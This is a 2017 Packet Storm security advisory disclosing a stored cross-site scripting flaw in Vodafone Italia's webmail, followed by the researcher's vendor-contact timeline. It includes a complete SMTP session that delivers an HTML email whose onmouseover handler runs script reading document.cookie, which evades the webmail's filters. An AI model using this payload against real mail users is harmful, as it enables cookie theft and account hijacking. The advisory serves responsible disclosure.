Vodafone Italia Webmail Cross Site Scripting

2017-07-13T00:00:00
ID PACKETSTORM:143360
Type packetstorm
Reporter theMiddle
Modified 2017-07-13T00:00:00

Description

                                        
                                            `# Title: Vodafone Webmail - Stored Cross-Site Scripting  
# Date: 2017-07-14  
# Exploit Author: theMiddle / https://github.com/theMiddleBlue  
# Website: https://web.mail.vodafone.it  
  
  
1. Description  
the Vodafone Italia webmail (web.mail.vodafone.it) suffers from a   
stored cross-site scripting vulnerability. The XSS-Filters can be eluded,  
and the vulnerability can be exploited, by sending an e-mail message with  
a specific format that will be shown below.  
  
After years of no-answer from Vodafone, I decided to disclose it in order  
to alert users and companies that use this webmail.  
  
  
2. Exploit vulnerability  
-------------------------------------------  
# telnet mx.vodafone.arubamail.it 25  
Trying 62.149.178.10...  
Connected to mx.vodafone.arubamail.it.  
Escape character is '^]'.  
220 mxcmd02.vf.aruba.it bizsmtp ESMTP server ready  
HELO example.com  
250 mxcmd02.vf.aruba.it hello [*****], pleased to meet you  
MAIL FROM: themiddle@protonmail.ch  
250 2.1.0 <themiddle@protonmail.ch> sender ok  
RCPT TO: *****@vodafone.it  
250 2.1.5 <*****@vodafone.it> recipient ok  
DATA  
354 enter mail, end with "." on a line by itself  
Subject: test xss  
From: theMiddle <themiddle@protonmail.ch>  
To: *****@vodafone.it  
Content-Type: text/html; charset=utf-8  
  
<div onmouseover  
="alert(document.cookie);"  
style  
="height:600px;">  
test  
</div>  
  
.  
250 2.0.0 kJLA1v0060an1Af01JLXCz mail accepted for delivery  
QUIT  
221 2.0.0 mxcmd02.vf.aruba.it bizsmtp closing connection  
Connection closed by foreign host.  
--------------------------------------------  
  
A screenshot of the executed javascript on Chrome Browser:  
http://i.imgur.com/Ap4NK9c.png  
  
  
3. Timeline  
2014-10-31: Initial report to abuse Vodafone e-mail address (no answer received).  
2015-06-25: Second contact via social network (no answer received).  
2017-07-13: Third e-mail to italy.abuse@mail.vodafone.it (no answer received).  
2017-07-14: Disclosure.  
`